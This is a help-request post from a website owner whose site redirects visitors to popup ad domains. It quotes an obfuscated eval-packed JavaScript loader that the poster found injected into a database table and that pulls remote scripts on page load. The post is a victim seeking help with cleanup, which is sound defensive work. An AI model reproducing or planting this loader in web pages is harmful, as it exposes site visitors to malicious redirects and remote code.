Some time if i click a link in my website, my browser open extra window and redirect to poptm url, so i try
the diagnostic result show that
Some pages on my website send visitors to the following dangerous websites: majalah-paradigma.webs.com, zief.pl, and chura.pl.
I try to scan my website with this http://ift.tt/1OYvwo1 , and the result show me some java script code like this
<script type="text/javascript" data-cfasync="false">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('!1(){2 e=d;2 t,o=["//g.s.j/3.5","//l.h/3.5",""],n=0,r=1(){f(""!=o[n]){t=e.4.c("6"),t.b="7/8",t.9=!0;2 a=e.4.q("6")[0];t.i=o[n],t.k=1(){n++,r()},a.m.p(t,a)}};r()}();',30,30,'|function|var|9937|document|js|script|text|javascript|async||type|createElement|window||if|code|cf|src|com|onerror|javacript|parentNode|||insertBefore|getElementsByTagName||poptm|'.split('|'),0,{}))
i try to find that code in my website but i can't find that code , so i try my database, i find in one of my table column there are three record that have the code like above, so i delete that record, but i am confuse how that code insert code to my database, I try to google poptm, i find poptm is tools to Bypass Adblock, so i think some malware may be have instaled poptm to my website, so deleting record from my database may not a solution , how i can delete this poptm ? Any one have found something like this before?any sugestion? Sory for my english
Aucun commentaire:
Enregistrer un commentaire